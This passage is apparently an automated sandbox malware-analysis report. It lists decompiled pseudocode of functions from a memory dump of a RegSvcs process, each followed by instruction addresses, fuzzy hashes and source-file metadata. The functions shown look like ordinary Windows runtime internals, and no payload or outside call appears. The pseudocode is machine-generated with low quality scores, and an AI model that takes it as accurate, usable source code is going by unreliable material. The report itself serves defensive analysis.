													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x19bb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x19b84c0;
																			if(_t82 >=  *0x19b84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01999063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E018C922A(_t99);
										_t64 = E018E7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01998B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x19b86c0; // 0x13907b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x19b86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x19b86bc;
													_t87 = 0x19b86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E018C9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x19b86c4;
												_t87 = 0x19b86c0;
												L27:
												E018F9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0191D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x19b5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x19b538c = _t51;
						goto L6;
					}
				}
			}

0x018c9082
0x018c9083
0x018c9084
0x018c9085
0x018c9087
0x018c9096
0x018c9098
0x018c9098
0x018c909e
0x018c90a8
0x018c90e7
0x018c90e7
0x018c90aa
0x018c90b0
0x018c90b7
0x018c90bd
0x018c90dd
0x018c90e6
0x018c90bf
0x018c90bf
0x018c90c7
0x018c90cf
0x018c90f1
0x018c90f2
0x018c90f4
0x018c90f5
0x018c90f6
0x018c90f7
0x018c90f8
0x018c90f9
0x018c90fa
0x018c90fb
0x018c90fc
0x018c90fd
0x018c90fe
0x018c90ff
0x018c9100
0x018c9102
0x018c9107
0x018c910c
0x018c9110
0x018c9113
0x018c9115
0x018c9136
0x018c913f
0x018c9143
0x019237e4
0x019237e4
0x018c9117
0x018c9117
0x018c911d
0x00000000
0x018c911f
0x018c911f
0x018c9125
0x00000000
0x018c9127
0x018c912d
0x018c9130
0x018c9134
0x018c9158
0x018c915d
0x018c9161
0x018c9168
0x01923715
0x018c916e
0x018c916e
0x018c9175
0x018c9177
0x018c917e
0x018c917f
0x018c9182
0x018c9182
0x018c9187
0x018c9187
0x018c918a
0x018c918d
0x018c918f
0x018c9192
0x018c9195
0x018c9198
0x018c9198
0x018c9198
0x018c919a
0x00000000
0x00000000
0x0192371f
0x01923721
0x01923727
0x0192372f
0x01923733
0x01923735
0x01923738
0x0192373b
0x0192373d
0x01923740
0x00000000
0x01923746
0x01923746
0x01923749
0x00000000
0x0192374f
0x0192374f
0x01923751
0x01923757
0x01923759
0x0192375c
0x0192375c
0x0192375e
0x0192375e
0x01923761
0x01923764
0x00000000
0x00000000
0x01923766
0x01923768
0x019237a3
0x019237a3
0x019237a5
0x019237a7
0x019237ad
0x019237b0
0x019237b2
0x019237bc
0x019237c2
0x019237c2
0x019237b2
0x018c9187
0x018c9187
0x018c918a
0x018c918d
0x018c918f
0x018c9192
0x018c9195
0x00000000
0x018c9195
0x00000000
0x0192376a
0x0192376a
0x0192376a
0x0192376c
0x0192376c
0x0192376f
0x01923775
0x00000000
0x00000000
0x01923777
0x01923779
0x01923782
0x01923787
0x01923789
0x01923790
0x01923790
0x0192378b
0x0192378b
0x0192378b
0x01923792
0x01923795
0x00000000
0x01923795
0x00000000
0x01923779
0x01923798
0x00000000
0x01923798
0x00000000
0x01923768
0x0192379b
0x0192379b
0x01923751
0x01923749
0x00000000
0x01923740
0x018c91a0
0x018c91a3
0x018c91a9
0x018c91b0
0x00000000
0x018c91b0
0x018c9187
0x018c91b4
0x018c91b4
0x018c91bb
0x018c91c0
0x018c91c5
0x018c91c7
0x019237da
0x018c91cd
0x018c91cd
0x018c91cd
0x018c91d2
0x018c91d5
0x018c9239
0x018c9239
0x018c91d7
0x018c91db
0x018c91e1
0x018c91e7
0x018c91fd
0x018c9203
0x018c921e
0x018c9223
0x00000000
0x018c9205
0x018c9205
0x018c9208
0x018c920c
0x018c9214
0x018c9214
0x018c920c
0x018c91e9
0x018c91e9
0x018c91ee
0x018c91f3
0x018c91f3
0x018c91f3
0x018c91e7
0x00000000
0x00000000
0x00000000
0x018c9134
0x018c9125
0x018c911d
0x018c914e
0x018c90d1
0x018c90d1
0x018c90d3
0x018c90d6
0x018c90d8
0x00000000
0x018c90d8
0x018c90cf

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8db7e9c17c8f5f3c18568b72cc57ea0ca36e3a8c05d2659fd7f44d6ae0e3a70
Instruction ID: e67032ca778471c2346d8093c2daf09bb75c8c140c01ae10f8d801664a8d0326
Opcode Fuzzy Hash: c8db7e9c17c8f5f3c18568b72cc57ea0ca36e3a8c05d2659fd7f44d6ae0e3a70
Instruction Fuzzy Hash: 5801A472905604CFD3259F1CD980B11BBE9EB45B29F2640AAE505CB791C774DD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0195C450 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0195C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E01909910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E019095B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E019095D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E019095D0();
				return L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0195c458
0x0195c45d
0x0195c466
0x0195c468
0x0195c469
0x0195c46a
0x0195c46b
0x0195c46e
0x0195c46f
0x0195c471
0x0195c476
0x0195c476
0x0195c47c
0x0195c47e
0x0195c480
0x0195c480
0x0195c483
0x0195c484
0x0195c486
0x0195c488
0x0195c48f
0x0195c491
0x0195c493
0x0195c493
0x0195c48f
0x0195c498
0x0195c49e
0x0195c4ad
0x0195c4ad
0x0195c4b2
0x0195c4b4
0x0195c4cd

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 14cd2b09d0c3503c8879f932961ffaed341cb291b57304d4f640bd6b930ec459
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 3C019671140606BFE725AF69CC80E62FB6DFF94755F004525F618525A0C722ACA1C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01994015 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E01994015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E018E2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E018E2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x19b86ac);
					E018CF900(0x19b86d4, _t28);
					E018DFFB0(0x19b86ac, _t28, 0x19b86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E018DFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0199401a
0x0199401e
0x01994023
0x01994028
0x01994029
0x0199402b
0x0199402f
0x01994043
0x01994046
0x01994051
0x01994057
0x0199405f
0x01994062
0x01994067
0x0199406f
0x0199407c
0x0199407c
0x0199408c
0x0199408c
0x01994097

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e1745921c65a20f20c71ed4528d17eec53061cece55892c7a83a12fe50c4753
Instruction ID: 9a491e78ea59e698487af7c628d36797a5b5ea5371a616f4fa327e7f674662d4
Opcode Fuzzy Hash: 7e1745921c65a20f20c71ed4528d17eec53061cece55892c7a83a12fe50c4753
Instruction Fuzzy Hash: FF017172241646BFD715AB6DCE84E53B7ACFB59750B000229B608C7A11DB24ED12C6E5

Uniqueness

Uniqueness Score: -1.00%

Function 0198138A Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0198138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x19bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0190FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E018E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0190B640(E01909AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0198138a
0x0198138a
0x01981399
0x019813a3
0x019813a8
0x019813aa
0x019813b5
0x019813bb
0x019813c3
0x019813c6
0x019813c9
0x019813d4
0x019813e6
0x019813d6
0x019813df
0x019813df
0x019813f1
0x019813f2
0x019813f4
0x019813f9
0x0198140e

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9f551882de1ccd0f45b75173bd5252ac0daffe04108457ebf4358ad7e10e5fa
Instruction ID: 0de2e7e42d244923aae2e4d22eff27507126cbda710e21c4870939832405eefc
Opcode Fuzzy Hash: b9f551882de1ccd0f45b75173bd5252ac0daffe04108457ebf4358ad7e10e5fa
Instruction Fuzzy Hash: DD01B571A0120CAFCB14EFA8D841FAEBBB8EF44710F004066F904EB380D670DA41C790

Uniqueness

Uniqueness Score: -1.00%

Function 019814FB Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E019814FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x19bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0190FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E018E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0190B640(E01909AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x019814fb
0x019814fb
0x0198150a
0x01981514
0x01981519
0x0198151b
0x01981526
0x0198152c
0x01981534
0x01981537
0x0198153a
0x01981545
0x01981557
0x01981547
0x01981550
0x01981550
0x01981562
0x01981563
0x01981565
0x0198156a
0x0198157f

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6442b401ad3cba9131f8186a42a3638af192ef3a28ac53c53fa3b39477bd857
Instruction ID: bf995092ece8b81bcba362bc1fc802dce4dd6ddddfab0c9cfa70e43d6877ed4f
Opcode Fuzzy Hash: d6442b401ad3cba9131f8186a42a3638af192ef3a28ac53c53fa3b39477bd857
Instruction Fuzzy Hash: 5501B571A0124CEFCB14EFA8D845EAEBBB8EF44710F004066F909EB380D670DA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 018C58EC Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E018C58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x19bd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x18a5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E018C5943() != 0 &&  *0x19b5320 > 5) {
					E01947B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01947B5E( &_v28, _t28);
					_t11 = E01947B9C(0x19b5320, 0x18abf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0190B640(_t11, _t17, _v8 ^ _t29, 0x18abf15, _t27, _t28);
			}

0x018c58fb
0x018c58fe
0x018c5906
0x018c590a
0x018c593c
0x018c593c
0x018c590c
0x018c590c
0x018c5911
0x00000000
0x018c5913
0x018c5913
0x018c5913
0x018c5911
0x018c591d
0x01921035
0x0192103c
0x0192103f
0x01921056
0x01921056
0x018c593b

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de568294ee54d5e48fe1207ca60a27a0601f093070d8122878e73011a94b6ba3
Instruction ID: 566ed4c994c89843d81cda911d0b6f9f4bdfd9cbae481bf4d5f0afcd15fa58ef
Opcode Fuzzy Hash: de568294ee54d5e48fe1207ca60a27a0601f093070d8122878e73011a94b6ba3
Instruction Fuzzy Hash: 0A018471B001099BDB18DE79ED409EEB7A8EF91664F9500A99A09D7244DF31EE09C750

Uniqueness

Uniqueness Score: -1.00%

Function 018DB02A Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018DB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E018E7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01947016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x018db037
0x018db039
0x018db03b
0x018db040
0x0192a60e
0x00000000
0x00000000
0x0192a61d
0x018db04b
0x018db04e
0x0192a627
0x0192a634
0x00000000
0x00000000
0x0192a641
0x0192a653
0x0192a643
0x0192a64c
0x0192a64c
0x0192a65b
0x00000000
0x00000000
0x00000000
0x0192a66c
0x018db057
0x018db057
0x018db057
0x018db046
0x018db046
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: fd4e88d7463bf4e7b28600c5875d4754b6314d9da6ceb72341918cdd77d55f11
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 63018F32201A84DFE326875CC988F667BDCEB86B54F0A00A1FA19CBA55D729DD40C621

Uniqueness

Uniqueness Score: -1.00%

Function 01991074 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01991074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0199165E(__ebx, 0x19b8ae4, (__edx -  *0x19b8b04 >> 0x14) + (__edx -  *0x19b8b04 >> 0x14), __edi, __ecx, (__edx -  *0x19b8b04 >> 0x14) + (__edx -  *0x19b8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0198AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E018E7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0197FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x01991074
0x01991080
0x01991082
0x0199108a
0x0199108f
0x01991093
0x019910ab
0x019910ab
0x019910c3
0x019910cf
0x019910e1
0x019910d1
0x019910da
0x019910da
0x019910e9
0x019910f5
0x019910f5
0x019910fe

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0726c96aa6736709b9bb6b8cdfacdd761919b94dc395970224797ccb1055dab9
Instruction ID: 8aaa78082e2428d5ea98964d9df50abd60d99d6a773f283e03c04a5f976bb00f
Opcode Fuzzy Hash: 0726c96aa6736709b9bb6b8cdfacdd761919b94dc395970224797ccb1055dab9
Instruction Fuzzy Hash: FD014C726047439FCB10EF6DC944B1A7BD9BFD4321F048929F98983690EE31D540CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0197FEC0 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0197FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x19bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0190FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E018E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0190B640(E01909AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0197fec0
0x0197fec0
0x0197fecf
0x0197fed9
0x0197fede
0x0197fee0
0x0197feeb
0x0197fef3
0x0197fef6
0x0197fef9
0x0197ff04
0x0197ff16
0x0197ff06
0x0197ff0f
0x0197ff0f
0x0197ff21
0x0197ff22
0x0197ff24
0x0197ff29
0x0197ff3e

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a71ea84dc276f103841e5583b632f0e3dd19c664f910533b27d792d2608cb74
Instruction ID: 3a5be452293fa0b25686a169d7e4f072a8f963416ec6c9def335a6ea53fe6e4d
Opcode Fuzzy Hash: 8a71ea84dc276f103841e5583b632f0e3dd19c664f910533b27d792d2608cb74
Instruction Fuzzy Hash: 93018F71A01209AFDB14DBA9D845FAEBBB8EF85710F004066BA05EB281EA709A41C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 0197FE3F Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0197FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x19bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0190FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E018E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0190B640(E01909AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0197fe3f
0x0197fe3f
0x0197fe4e
0x0197fe58
0x0197fe5d
0x0197fe5f
0x0197fe6a
0x0197fe72
0x0197fe75
0x0197fe78
0x0197fe83
0x0197fe95
0x0197fe85
0x0197fe8e
0x0197fe8e
0x0197fea0
0x0197fea1
0x0197fea3
0x0197fea8
0x0197febd

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ae2ca8316a108e9f47b0c458c31293a1358f9b6625db37727d311ddde4de93b
Instruction ID: 9474f39b6cd0ac2bae09f039e3cd01aaed9c3512584d5afe6ea9c0409af03ae7
Opcode Fuzzy Hash: 5ae2ca8316a108e9f47b0c458c31293a1358f9b6625db37727d311ddde4de93b
Instruction Fuzzy Hash: C601D471A01209AFCB14DFA8D845FAEBBB8EF80B04F004066B904EB281DA709A00C795

Uniqueness

Uniqueness Score: -1.00%

Function 01998A62 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

